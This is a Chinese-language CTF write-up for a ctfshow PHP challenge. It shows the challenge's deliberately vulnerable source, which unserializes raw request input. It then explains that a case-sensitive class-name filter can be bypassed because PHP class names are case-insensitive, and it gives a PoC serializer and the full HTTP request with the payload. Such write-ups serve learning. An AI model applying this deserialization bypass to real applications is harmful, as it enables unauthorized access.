看源码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-04 23:52:24
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
highlight_file(__FILE__);
include('flag.php');
$cs = file_get_contents('php://input');
class ctfshow{
public $username='xxxxxx';
public $password='xxxxxx';
public function __construct($u,$p){
$this->username=$u;
$this->password=$p;
}
public function login(){
return $this->username===$this->password;
}
public function __toString(){
return $this->username;
}
public function __destruct(){
global $flag;
echo $flag;
}
}
$ctfshowo=@unserialize($cs);
if(preg_match('/ctfshow/', $cs)){
throw new Exception("Error $ctfshowo",1);
}
这题只要能够成功反序列化一次行就行了(反序列化后当程序结束的时候会调用 __destruct() )
源码过滤了类名ctfshow,但是没有加参数 i
,所以盲猜是大小写绕过
经过测试发现,php序列化对键名的大小写不敏感,对类名也不敏感
所以我们构造这样的POC
<?php
class ctfshow{
public $username='xxxxxx';
public $password='xxxxxx';
}
$a = new ctfshow();
echo(serialize($a)); // O:7:"ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}
将序列化字符串中的 ctfshow
进行大小写变换
然后利用POST方法传入进去,因为这里利用的是 php://input
伪协议来传参,所以不需要键名,但是由于hackbar在post传参时如不添加键名会无法发送,所以我们可以用hackbar发送一个带键名的请求包到burpsuite,再用burpsuite修改就行了,注意Content-Length
不要错
请求包
POST / HTTP/1.1
Host: 3084db7a-3309-4420-b0ff-641fdc2292f7.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Origin: http://3084db7a-3309-4420-b0ff-641fdc2292f7.challenge.ctf.show
Connection: close
Referer: http://3084db7a-3309-4420-b0ff-641fdc2292f7.challenge.ctf.show/
Cookie: _ga=GA1.2.217265325.1679571526
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
O:7:"Ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}
注意不要对字符串进行 urlencode 因为 php://input 不会进行 urldecode